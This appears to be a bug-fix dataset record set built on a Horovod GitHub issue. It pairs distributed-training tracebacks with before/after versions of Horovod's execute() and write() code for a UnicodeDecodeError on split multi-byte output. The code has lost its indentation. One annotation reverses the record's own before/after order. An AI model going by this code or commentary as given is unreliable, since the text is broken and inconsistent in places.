Tue Oct 13 10:58:57 2020[3]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:57 2020[1]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:58 2020[3]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:58 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:57 2020[2]<stderr>:
Tue Oct 13 10:58:58 2020[3]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:58 2020[1]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:58 2020[2]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:58 2020[1]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:58 2020[2]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:58 2020[2]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:58 2020[3]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:58 2020[1]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:58 2020[2]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:58 2020[2]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:58 2020[3]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:58 2020[1]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:58 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:58 2020[1]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[2]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:59 2020[3]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:59 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:58:59 2020[2]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:59 2020[3]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:59 2020[3]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:59 2020[2]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:59 2020[1]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[2]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[1]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:58:59 2020[2]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[1]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:59:00 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:59:00 2020[1]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:59:00 2020[2]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:59:00 2020[2]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
|
UnicodeDecodeError
|
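The 'unexpected end of data' on byte 0xe2 is the classic chunked-decoding failure: tqdm's block characters ('█' is three UTF-8 bytes starting with 0xe2) get split across two pipe reads, and decoding each chunk independently blows up mid-character. codecs' incremental decoder buffers the trailing partial sequence instead of raising; a runnable demonstration:

import codecs

data = "65%|██████▌".encode("utf-8")
first, second = data[:8], data[8:]  # cut inside a 3-byte block character

try:
    first.decode("utf-8")
except UnicodeDecodeError as e:
    print("plain decode fails:", e)  # 'unexpected end of data', as in the log

decoder = codecs.getincrementaldecoder("utf-8")()
print(decoder.decode(first))   # emits the complete characters, buffers the rest
print(decoder.decode(second))  # resumes exactly where the last chunk stopped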
def execute(
command,
env=None,
stdout=None,
stderr=None,
index=None,
events=None,
prefix_output_with_timestamp=False,
):
"""
Execute the given command and forward stdout and stderr of the command to the given
stdout and stderr text streams, or sys.stdout and sys.stderr, respectively, if None given.
Prefixes each line with index and timestamp if index is not None. The timestamp
    can be disabled by setting prefix_output_with_timestamp to False.
The command will be terminated when any of the given events are set.
:param command: command to execute
:param env: environment variables to execute command with
:param stdout: stdout text stream, sys.stdout if None
:param stderr: stderr text stream, sys.stderr if None
:param index: index used to prepend text streams
:param events: events to terminate the command
:param prefix_output_with_timestamp: prepend text streams with timestamp if True
:return: command's exit code
"""
ctx = multiprocessing.get_context("spawn")
# When this event is set, signal to middleman to terminate its children and exit.
exit_event = _create_event(ctx)
# Make a pipe for the subprocess stdout/stderr.
(stdout_r, stdout_w) = ctx.Pipe()
(stderr_r, stderr_w) = ctx.Pipe()
# This Pipe is how we ensure that the executed process is properly terminated (not orphaned) if
# the parent process is hard killed (-9). If the parent (this process) is killed for any reason,
# this Pipe will be closed, which can be detected by the middleman. When the middleman sees the
# closed Pipe, it will issue a SIGTERM to the subprocess executing the command. The assumption
# here is that users will be inclined to hard kill this process, not the middleman.
(r, w) = ctx.Pipe()
middleman = ctx.Process(
target=_exec_middleman,
args=(
command,
env,
exit_event,
(stdout_r, stdout_w),
(stderr_r, stderr_w),
(r, w),
),
)
middleman.start()
# Close unused file descriptors to enforce PIPE behavior.
r.close()
stdout_w.close()
stderr_w.close()
# Redirect command stdout & stderr to provided streams or sys.stdout/sys.stderr.
# This is useful for Jupyter Notebook that uses custom sys.stdout/sys.stderr or
# for redirecting to a file on disk.
if stdout is None:
stdout = sys.stdout
if stderr is None:
stderr = sys.stderr
stdout_fwd = in_thread(
target=prefix_connection,
args=(stdout_r, stdout, "stdout", index, prefix_output_with_timestamp),
)
stderr_fwd = in_thread(
target=prefix_connection,
args=(stderr_r, stderr, "stderr", index, prefix_output_with_timestamp),
)
    # TODO: Currently this requires explicit declaration of the events and signal handler to set
# the event (gloo_run.py:_launch_jobs()). Need to figure out a generalized way to hide this behind
# interfaces.
stop = threading.Event()
events = events or []
for event in events:
on_event(event, exit_event.set, stop=stop, silent=True)
try:
middleman.join()
except:
# interrupted, send middleman TERM signal which will terminate children
exit_event.set()
while True:
try:
middleman.join()
break
except:
# interrupted, wait for middleman to finish
pass
finally:
stop.set()
stdout_fwd.join()
stderr_fwd.join()
return middleman.exitcode
|
def execute(
command,
env=None,
stdout=None,
stderr=None,
index=None,
events=None,
prefix_output_with_timestamp=False,
):
ctx = multiprocessing.get_context("spawn")
# When this event is set, signal to middleman to terminate its children and exit.
exit_event = _create_event(ctx)
# Make a pipe for the subprocess stdout/stderr.
(stdout_r, stdout_w) = ctx.Pipe()
(stderr_r, stderr_w) = ctx.Pipe()
# This Pipe is how we ensure that the executed process is properly terminated (not orphaned) if
# the parent process is hard killed (-9). If the parent (this process) is killed for any reason,
# this Pipe will be closed, which can be detected by the middleman. When the middleman sees the
# closed Pipe, it will issue a SIGTERM to the subprocess executing the command. The assumption
# here is that users will be inclined to hard kill this process, not the middleman.
(r, w) = ctx.Pipe()
middleman = ctx.Process(
target=_exec_middleman,
args=(
command,
env,
exit_event,
(stdout_r, stdout_w),
(stderr_r, stderr_w),
(r, w),
),
)
middleman.start()
# Close unused file descriptors to enforce PIPE behavior.
r.close()
stdout_w.close()
stderr_w.close()
# Redirect command stdout & stderr to provided streams or sys.stdout/sys.stderr.
# This is useful for Jupyter Notebook that uses custom sys.stdout/sys.stderr or
# for redirecting to a file on disk.
if stdout is None:
stdout = sys.stdout
if stderr is None:
stderr = sys.stderr
stdout_fwd = in_thread(
target=forward_stream,
args=(stdout_r, stdout, "stdout", index, prefix_output_with_timestamp),
)
stderr_fwd = in_thread(
target=forward_stream,
args=(stderr_r, stderr, "stderr", index, prefix_output_with_timestamp),
)
    # TODO: Currently this requires explicit declaration of the events and signal handler to set
# the event (gloo_run.py:_launch_jobs()). Need to figure out a generalized way to hide this behind
# interfaces.
stop = threading.Event()
events = events or []
for event in events:
on_event(event, exit_event.set, stop=stop, silent=True)
try:
middleman.join()
except:
# interrupted, send middleman TERM signal which will terminate children
exit_event.set()
while True:
try:
middleman.join()
break
except:
# interrupted, wait for middleman to finish
pass
finally:
stop.set()
stdout_fwd.join()
stderr_fwd.join()
return middleman.exitcode
|
https://github.com/horovod/horovod/issues/2367
|
Tue Oct 13 10:54:25 2020[0]<stderr>:[10/13/2020 10:54:25 - INFO - __main__ - start running validation...
Tue Oct 13 10:54:25 2020[0]<stderr>: 0%| | 0/1327 [00:00<?, ?it/s]
Tue Oct 13 10:55:56 2020[0]<stderr>:
Exception in thread Thread-17:derr>: 65%|██████▌ | 866/1327 [01:17<00:47, 9.80it/s]
Traceback (most recent call last):
File "/data/anaconda3/envs/vcr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/data/anaconda3/envs/vcr/lib/python3.6/threading.py", line 864, in run
self._target(*self._args, **self._kwargs)
File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/runner/common/util/safe_shell_exec.py", line 104, in forward_stream
text = text.decode('utf-8')
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe2 in position 999: unexpected end of data
Tue Oct 13 10:58:56 2020[3]<stderr>:[2020-10-13 10:58:56.365049: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:84] Timed out waiting 30000ms for recv operation to complete
Tue Oct 13 10:58:56 2020[2]<stderr>:[2020-10-13 10:58:56.366492: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:84] Timed out waiting 30000ms for recv operation to complete
Tue Oct 13 10:58:56 2020[1]<stderr>:[2020-10-13 10:58:56.366674: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:136] Timed out waiting 30000ms for send operation to complete
Tue Oct 13 10:58:56 2020[3]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[1]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[2]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[3]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:56 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[3]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:56 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[3]<stderr>:
Tue Oct 13 10:58:56 2020[1]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:56 2020[2]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:57 2020[3]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[2]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:57 2020[1]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:57 2020[3]<stderr>:
Tue Oct 13 10:58:57 2020[1]<stderr>:
Tue Oct 13 10:58:57 2020[2]<stderr>:
Tue Oct 13 10:58:57 2020[3]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:57 2020[2]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[1]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[3]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:57 2020[1]<stderr>:
Tue Oct 13 10:58:57 2020[3]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:57 2020[1]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:57 2020[3]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:57 2020[1]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:57 2020[3]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:57 2020[1]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:57 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:57 2020[1]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:57 2020[3]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:57 2020[1]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:58 2020[3]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:58 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:57 2020[2]<stderr>:
Tue Oct 13 10:58:58 2020[3]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:58 2020[1]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:58 2020[2]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:58 2020[1]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:58 2020[2]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:58 2020[2]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:58 2020[3]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:58 2020[1]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:58 2020[2]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:58 2020[2]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:58 2020[3]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:58 2020[1]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:58 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:58 2020[1]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[2]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:59 2020[3]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:59 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:58:59 2020[2]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:59 2020[3]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:59 2020[3]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:59 2020[2]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:59 2020[1]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[2]<stderr>: return HorovodAllgather.apply(tensor, name)
Tue Oct 13 10:58:59 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 328, in forward
Tue Oct 13 10:58:59 2020[1]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:58:59 2020[2]<stderr>: return synchronize(handle)
Tue Oct 13 10:58:59 2020[1]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:59:00 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 626, in synchronize
Tue Oct 13 10:59:00 2020[1]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:59:00 2020[2]<stderr>: raise HorovodInternalError(e)
Tue Oct 13 10:59:00 2020[2]<stderr>:horovod.common.exceptions.HorovodInternalError: Horovod has been shut down. This was causedby an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finishedexecution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
|
UnicodeDecodeError
|
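execute() hands each output pipe to a background forwarding thread (forward_stream before the fix, prefix_connection after); whichever function does that job must survive arbitrary bytes from the child, or the thread dies exactly as in the log above. The stand-in below sketches such a forwarding loop with errors="replace" as a last-resort guard; forward_prefixed and in_thread_stub are illustrative, not Horovod's actual helpers:

import os
import threading

def forward_prefixed(conn, dst_stream, prefix, index):
    # Read raw byte chunks from the pipe's file descriptor and re-emit each
    # line with an "[index]<prefix>:" marker. errors="replace" keeps the
    # thread alive on malformed or split UTF-8 (cf. the UnicodeDecodeError).
    while True:
        chunk = os.read(conn.fileno(), 4096)
        if not chunk:
            break
        text = chunk.decode("utf-8", errors="replace")
        for line in text.splitlines(True):
            dst_stream.write("[%s]<%s>:%s" % (index, prefix, line))
        dst_stream.flush()

def in_thread_stub(target, args=()):
    # Hypothetical equivalent of Horovod's in_thread(): run target in a
    # daemon thread and return it so the caller can join() it later.
    thread = threading.Thread(target=target, args=args, daemon=True)
    thread.start()
    return thread

errors="replace" trades split multi-byte characters for U+FFFD markers; the incremental decoder shown after the previous record avoids even that loss.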
def write(text):
if index is not None and prefix is not None:
context = get_context(index, prefix)
dst_stream.write(context)
dst_stream.write(text)
dst_stream.flush()
|
def write(text):
if index is not None:
text = prepend_context(text, index, prefix)
dst_stream.write(text)
dst_stream.flush()
|
https://github.com/horovod/horovod/issues/2367
|
Tue Oct 13 10:54:25 2020[0]<stderr>:[10/13/2020 10:54:25 - INFO - __main__ - start running validation...
Tue Oct 13 10:54:25 2020[0]<stderr>: 0%| | 0/1327 [00:00<?, ?it/s]
Tue Oct 13 10:55:56 2020[0]<stderr>:
Exception in thread Thread-17:derr>: 65%|██████▌ | 866/1327 [01:17<00:47, 9.80it/s]
Traceback (most recent call last):
File "/data/anaconda3/envs/vcr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/data/anaconda3/envs/vcr/lib/python3.6/threading.py", line 864, in run
self._target(*self._args, **self._kwargs)
File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/runner/common/util/safe_shell_exec.py", line 104, in forward_stream
text = text.decode('utf-8')
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xe2 in position 999: unexpected end of data
Tue Oct 13 10:58:56 2020[3]<stderr>:[2020-10-13 10:58:56.365049: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:84] Timed out waiting 30000ms for recv operation to complete
Tue Oct 13 10:58:56 2020[2]<stderr>:[2020-10-13 10:58:56.366492: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:84] Timed out waiting 30000ms for recv operation to complete
Tue Oct 13 10:58:56 2020[1]<stderr>:[2020-10-13 10:58:56.366674: E /dockerdata/app/tmp/pip-install-998q9kn4/horovod/horovod/common/operations.cc:525] Horovod background loop uncaught exception: [/dockerdata/app/tmp/pip-install-998q9kn4/horovod/third_party/compatible_gloo/gloo/transport/tcp/unbound_buffer.cc:136] Timed out waiting 30000ms for send operation to complete
Tue Oct 13 10:58:56 2020[3]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[1]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[2]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:56 2020[3]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:56 2020[2]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[3]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:56 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 622, in synchronize
Tue Oct 13 10:58:56 2020[3]<stderr>:
Tue Oct 13 10:58:56 2020[1]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:56 2020[2]<stderr>: mpi_lib.horovod_torch_wait_and_clear(handle)
Tue Oct 13 10:58:57 2020[3]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[2]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:57 2020[1]<stderr>:RuntimeError: Horovod has been shut down. This was caused by an exception on one of the ranks or an attempt to allreduce, allgather or broadcast a tensor after one of the ranks finished execution. If the shutdown was caused by an exception, you should see the exception in the log before the first shutdown message.
Tue Oct 13 10:58:57 2020[3]<stderr>:
Tue Oct 13 10:58:57 2020[1]<stderr>:
Tue Oct 13 10:58:57 2020[2]<stderr>:
Tue Oct 13 10:58:57 2020[3]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:57 2020[2]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[1]<stderr>:During handling of the above exception, another exception occurred:
Tue Oct 13 10:58:57 2020[3]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:57 2020[1]<stderr>:
Tue Oct 13 10:58:57 2020[3]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:57 2020[1]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:57 2020[3]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:57 2020[1]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:57 2020[3]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:57 2020[1]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:57 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:57 2020[1]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:57 2020[3]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:57 2020[1]<stderr>: val_log = validate(model, val_dataloader)
Tue Oct 13 10:58:58 2020[3]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:58 2020[1]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/torch/autograd/grad_mode.py", line 49, in decorate_no_grad
Tue Oct 13 10:58:57 2020[2]<stderr>:
Tue Oct 13 10:58:58 2020[3]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:58 2020[1]<stderr>: return func(*args, **kwargs)
Tue Oct 13 10:58:58 2020[2]<stderr>:Traceback (most recent call last):
Tue Oct 13 10:58:58 2020[1]<stderr>: File "train_vcr.py", line 310, in validate
Tue Oct 13 10:58:58 2020[2]<stderr>: File "train_vcr.py", line 332, in <module>
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/cdp_algo_ceph_ssd/users/haoyanhuo/vcr/utils/distributed.py", line 233, in all_gather_list
Tue Oct 13 10:58:58 2020[2]<stderr>: main(parse_cmd_args(TrainingOpts))
Tue Oct 13 10:58:58 2020[3]<stderr>: max_size = hvd.allgather(torch.tensor([enc_size]).cuda()).max().item()
Tue Oct 13 10:58:58 2020[1]<stderr>: qa_loss = sum(all_gather_list(qa_loss))
Tue Oct 13 10:58:58 2020[2]<stderr>: File "train_vcr.py", line 260, in main
Tue Oct 13 10:58:58 2020[3]<stderr>: File "/data/anaconda3/envs/vcr/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 365, in allgather
Tue Oct 13 10:58:58 2020[2]<stderr>: val_log = validate(model, val_dataloader)
